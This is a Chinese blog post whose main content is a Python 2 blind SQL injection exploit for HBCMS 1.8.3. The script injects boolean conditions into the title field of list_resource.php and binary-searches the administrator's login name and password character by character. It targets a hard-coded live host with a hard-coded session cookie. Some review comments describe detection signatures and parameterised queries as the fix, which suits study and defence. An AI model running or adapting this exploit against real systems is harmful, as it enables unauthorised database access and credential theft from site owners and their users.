python 盲注 HBCMS 1.8.3 漏洞

参考文章:http://tunps.com/hbcms-list_resource-php-blind-sql-injection


根据文章所写,应该是需要cookie。做好准备工作,上传个图片。

代码采用二分法,类似于sqlmap的算法

#-*- coding: UTF-8 -*-
__author__ = 'Administrator'  # module author metadata carried over from the original post

import requests

def post_data(step,p,min,max):
    """Build the boolean condition that the main loop injects into ``title``.

    step -- 1 / 2: compare the length of login_name / login_pass with ``p``
            (``length(...) > p``);
            3 / 4: test whether character ``p`` (1-based, via ``mid``) of
            login_name / login_pass lies in the inclusive ASCII range
            ``char(min)`` .. ``char(max)``.
    p    -- candidate length (steps 1-2) or character position (steps 3-4).
    min, max -- ASCII bounds used only by steps 3-4; ignored otherwise.
    Returns the SQL fragment as a plain string (no quoting is applied here).

    NOTE(review): ``sql_code`` is assigned only for step 1-4, so any other
    value raises UnboundLocalError at the ``return``; ``min``/``max`` also
    shadow the builtins. From a defender's view every fragment is a
    textbook boolean-blind probe: only the comparison constant changes
    between requests, so ``title`` values containing ``from hbcms_users``
    or ``between char(`` are a reliable log / WAF signature, and the root
    cause (presumably unescaped input reaching the query in
    list_resource.php, per the linked write-up) is closed by parameterised
    queries rather than by filtering.
    """
    if step == 1:
        sql_code = "(select length(login_name) from hbcms_users where id=1)>"+str(p)
    if step == 2:
        sql_code = "(select length(login_pass) from hbcms_users where id=1)>"+str(p)
    if step == 3:
        sql_code = "(select mid(login_name,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
    if step == 4:
        sql_code = "(select mid(login_pass,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
    return sql_code

# Python 2 script (print statements, str-typed r.content). Flow: steps 1-2
# binary-search the lengths of login_name / login_pass, steps 3-4 then
# binary-search each character over printable ASCII. The oracle is whether a
# known uploaded image filename appears in the response body of
# list_resource.php, i.e. whether the injected boolean made the listing
# non-empty. Every request is a POST whose only varying part is the
# comparison constant inside ``title`` -- the pattern a request log or WAF
# rule would key on.
header = {  # Cookie header; the post says a valid logged-in session is required, and these values are hard-coded
            "Cookie":"visited_page=5629-; bdshare_firstime=1422370057395; PHPSESSION=ep7nhkn8poei9jbckd68j2arr1; HBcmsLogin=19d2c1427b496606c40cdfa0f7139327dca4962953fb8ea0fda93c3b87635c12lbc555; HBcmsLoginName=lbc555; HBcmsLoginID=1122; Hm_lvt_f9fcde02679434efdea208afff286914=1422370057,1422410160; Hm_lpvt_f9fcde02679434efdea208afff286914=1422410945; AJSTAT_ok_pages=28; AJSTAT_ok_times=1; Hm_lvt_a3afd03fd164ca89566a02f9c9db5dad=1422370057,1422410160; Hm_lpvt_a3afd03fd164ca89566a02f9c9db5dad=1422410945"
}
# search state: lengths found in steps 1-2, characters accumulated in steps 3-4
name_len = 1
pass_len = 32
name_con = ""
pass_con = ""
for step in range(1,5):
    if step == 1 or step == 2:
        # length search over the open interval (min, max) = (0, 40), starting at 20
        p = 20
        min = 0
        max = 40
        while(1):
            #print str(max)+":"+str(min)
            if p == 40:
                # upper bound reached: the script gives up rather than widening the window
                print "Too long! Fuck you!"
                break
            payload = {
                "show_top_part=":"yes",  # NOTE(review): key carries a trailing '=' (sent as-is)
                "pageID":"1",
                "category_id":"all",
                "file_type":"0",
                # injection point: 'q%"' closes the quoted LIKE pattern, the boolean
                # condition follows, and '"%a%"="%a' re-balances the quotes
                "title":"q%\" and "+ post_data(step,p,0,0) +" and \"%a%\"=\"%a",
                "btnSubmit":"提交"
            }
            r = requests.post('http://hackblog.cn/user/list_resource.php',data=payload,headers=header) # target URL is hard-coded here
            if "1309_1122_150128100612.gif" in r.content: # oracle: the uploaded image's filename is listed only when the condition is TRUE
                # TRUE -> length > p: raise the lower bound
                min = p
                p = int(round((float(max) - float(min))/2)) + min
                if max - min == 1:
                    # window closed: length > min and length <= max, so the length is max.
                    # Python 2 rounds 0.5 up, which is what makes p land on max here.
                    if step == 1:
                        name_len = p
                        print "username length is "+str(name_len)
                        break
                    if step == 2:
                        pass_len = p
                        print "password length is "+str(pass_len)
                        break
            else:
                # FALSE -> length <= p: lower the upper bound
                max = p
                p = int(round((float(max) - float(min))/2)) + min
                if max - min == 1:
                    # same termination as the TRUE branch (duplicated code)
                    if step == 1:
                        name_len = p
                        print "username length is "+str(name_len)
                        break
                    if step == 2:
                        pass_len = p
                        print "password length is "+str(pass_len)
                        break

    if step == 3 or step == 4:
        if step == 3:
            end = name_len
        else:
            end = pass_len
        # one binary search per character position k, over printable ASCII 32..126
        for k in range(1,end+1):
            p = 47
            min = 32
            max = 126
            while(1):
                #print str(max)+":"+str(min)+":"+str(p)
                payload = {
                    "show_top_part=":"yes",
                    "pageID":"1",
                    "category_id":"all",
                    "file_type":"0",
                    # condition: character k is between char(p) and char(max)
                    "title":"q%\" and "+ post_data(step,k,p,max) +" and \"%a%\"=\"%a",
                    "btnSubmit":"提交"
                }
                r = requests.post('http://hackblog.cn/user/list_resource.php',data=payload,headers=header) # target URL is hard-coded here
                if "1309_1122_150128100612.gif" in r.content: # oracle: same TRUE/FALSE signal as above
                    if max - min == 2:
                        # TRUE with a 2-wide window: char >= p and char < max, so char == p
                        if step == 3:
                            name_con = name_con + chr(p)
                            print "username is "+name_con
                        else:
                            pass_con = pass_con + chr(p)
                            print "password is "+pass_con
                        break
                    if max - min == 1:
                        # NOTE(review): appears to widen the window by one so it never
                        # collapses below 2 before the check above fires -- intent inferred
                        max = max + 1
                    # TRUE -> char >= p: raise the lower bound
                    min = p
                    p = int(round((float(max) - float(min))/2)) + min

                else:
                    if max - min == 1:
                        # NOTE(review): mirror of the widening above on the FALSE side -- intent inferred
                        min = min - 1
                    # FALSE -> char < p: lower the upper bound
                    max = p
                    p = int(round((float(max) - float(min))/2)) + min

仅作记录学习,想写成exp的自行修改。


本文由Hack Blog原创,如需转载注明原文链接

作者:落 分类:Python 浏览:1966 评论:0